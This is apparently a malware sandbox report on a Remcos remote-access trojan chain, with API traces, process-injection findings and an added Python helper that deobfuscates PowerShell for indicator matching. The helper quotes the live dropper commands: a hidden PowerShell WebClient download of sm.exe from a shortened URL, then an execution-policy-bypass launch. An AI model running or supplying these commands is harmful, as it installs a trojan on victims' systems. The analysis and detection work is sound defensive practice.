                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: powershell.exe, 0000000A.00000002.2175630207.00000000001AE000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\sm.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                Bypasses PowerShell execution policy
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
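                The three PowerShell command lines this chain uses (the one above plus the download and Move-Item stages listed again under the process-creation entries further down) are obfuscated with string concatenation inside the invocation operator, `.('S'+'tart'+'-Sl'+'eep')`, and with backticks inserted into bare words, nEw-oB`jecT and ${enV`:temp}, which PowerShell ignores but which defeat naive substring matching. `-w 1` is `-WindowStyle Hidden` (the enum value 1) and `-EP bypass` is the accepted abbreviation of `-ExecutionPolicy Bypass`. Note that the execution policy is a safety feature, not a security boundary, so the bypass is a telemetry signal rather than a defeated control. The following Python is an added triage helper, not part of the sandbox report: it reverses those three obfuscation tricks and matches indicators on the normalized form. The command lines are copied from this report; the indicator names and regexes are the author's own choice.

```python
import re

# The three command lines copied from this report's process-creation entries.
SAMPLE_COMMANDS = [
    "powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')",
    "powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'",
    "powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')",
]

# A backtick only carries meaning before one of PowerShell's escape characters
# (`0 `a `b `e `f `n `r `t `u `v ``); anywhere else it is padding and can go.
TICK_RE = re.compile(r"`(?![0abefnrtuv`])")
# 'a'+'b'+'c' string-concatenation chains.
CONCAT_RE = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")
# .('name') and &('name'): the invocation operator applied to a string literal.
INVOKE_RE = re.compile(r"[.&]\('([^']*)'\)")


def normalize_powershell(cmd):
    """Undo tick insertion, string concatenation and .('...') invocation."""
    cmd = TICK_RE.sub("", cmd)
    cmd = CONCAT_RE.sub(
        lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'", cmd
    )
    cmd = INVOKE_RE.sub(r"\1", cmd)
    return cmd


# Indicator names are this example's own labels, not the report's signature names.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-e\w*\s+bypass", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "webclient_download": re.compile(r"net\.webclient.*download(?:file|string)", re.I),
    "delayed_execution": re.compile(r"start-sleep\s+\d+", re.I),
    "temp_directory": re.compile(r"\$\{?env:temp\}?", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def triage(cmd):
    """Return the normalized command line, the indicators it trips and any URLs."""
    norm = normalize_powershell(cmd)
    return {
        "normalized": norm,
        "indicators": [name for name, rx in INDICATORS.items() if rx.search(norm)],
        "urls": URL_RE.findall(norm),
    }


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(triage(cmd))
```

Matching on the normalized string rather than the raw one is what makes the `Start-Sleep`, `DownloadFile` and `${env:temp}` indicators fire at all; the raw command lines contain none of those substrings.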
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\sm.exeMemory written: C:\Users\user\AppData\Local\Temp\sm.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory written: C:\Users\user\AppData\Roaming\Remcos\remcos.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory written: C:\Users\user\AppData\Roaming\Remcos\remcos.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE